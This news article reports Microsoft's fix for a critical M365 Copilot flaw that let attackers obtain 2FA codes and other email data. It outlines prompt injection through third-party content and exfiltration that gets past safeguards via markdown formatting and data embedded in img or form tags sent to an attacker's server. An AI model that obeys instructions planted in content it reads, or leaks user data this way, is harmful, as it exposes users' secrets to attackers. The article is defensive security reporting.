Copilot: Critical Vulnerability Exposing 2FA Codes Fixed

Microsoft Fixes Critical Flaw in Copilot

Last Tuesday, Microsoft rolled out a crucial update to address a vulnerability deemed critical in its artificial intelligence tool, M365 Copilot. This flaw, reported by security researchers to Microsoft, allowed hackers to access 2FA codes as well as other sensitive information contained in emails that Copilot could access. On Monday, the researchers detailed their exploitation method, demonstrating how they were able to extract this sensitive data.

Challenges of Large Language Models

Microsoft, like other companies using LLMs (large language models), faces challenges in preventing its systems from responding to malicious queries. The main issue lies in the inability of AI bots to distinguish legitimate instructions from commands embedded in third-party content. These models, in summary, can be manipulated to execute actions on behalf of the user without discernment. To address this weakness, Microsoft and its competitors must implement complex and often temporary safeguards to limit the consequences of this intrinsic vulnerability.

Bypassing Safeguards

Copilot, like most LLMs, incorporates safeguards designed to prevent actions such as sending emails or submitting web forms, which could be used to extract user data. However, hackers have found ways to bypass these protections using markup language. This allows for the addition of formatting elements like headings, lists, or links without requiring HTML tags.

Furthermore, another technique involves encapsulating sensitive data within HTML tags, such as <img> or <form>. Once these tags are integrated into a web request, they send the information to the attacker's web server, where it is logged, enabling hackers to capture the secret data.